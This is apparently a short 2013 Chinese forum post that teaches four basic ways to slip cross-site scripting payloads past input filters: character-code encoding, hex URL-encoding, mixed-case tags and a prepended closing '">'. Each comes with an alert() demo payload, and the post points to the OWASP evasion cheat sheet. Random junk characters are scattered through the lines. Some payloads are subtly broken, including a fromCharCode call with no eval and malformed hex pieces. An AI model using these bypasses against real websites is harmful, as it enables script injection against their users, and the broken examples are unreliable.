四种超级基础的绕过方法。
6 z7 ^& n+ ~! b9 t% x, d' E1.转换为ASCII码% |* S4 R! b+ P
例子:原脚本为<script>alert(‘I love F4ck’)</script >
. s* p( P! P: H) b. S通过转换,变成:
* e9 n; A1 x2 X0 x" K. e<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
+ R' u! x; j; k; z7 N+ j " U. b$ |, a, R" u5 i* g `- K" \$ |
2.转换为HEX(十六进制), N9 m) I8 p& F0 o
例子:原脚本为<script>alert(‘I love F4ck’)</script>) Y9 ^1 b, G; E3 s- D1 x
通过转换,变成:
3 s% @6 ?4 V2 B; J/ M6 g1 A%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
9 \8 h3 N0 E( i5 o) [* C3 k# d 4 s2 B8 V" a- C
3.转换脚本的大小写
+ h' _3 H K2 S% S& G8 L例子:原脚本为<script>alert(‘I love F4ck’)</script>
$ a7 c8 x! l5 ]+ ^0 t& l! t转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>1 F" G- f0 ~. w. {0 R" _+ T
% n9 \) m9 n/ [3 E( f) X' |8 J9 t/ H
4.增加闭合标记”>" r0 V% n1 s# R' u- E
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 e& g0 _# f3 Q3 t转换为:”><script>alert(‘I love F4ck’)</script>+ ?' K; o' l% s6 }9 \* k/ P
更详细绕过技术请参考此网页0 d0 w8 e: T- ?+ ~5 ~, g: ]
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
7 O2 {, B' P Y9 Z. c7 p" Q 6 h4 p+ D2 l+ I3 ~
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对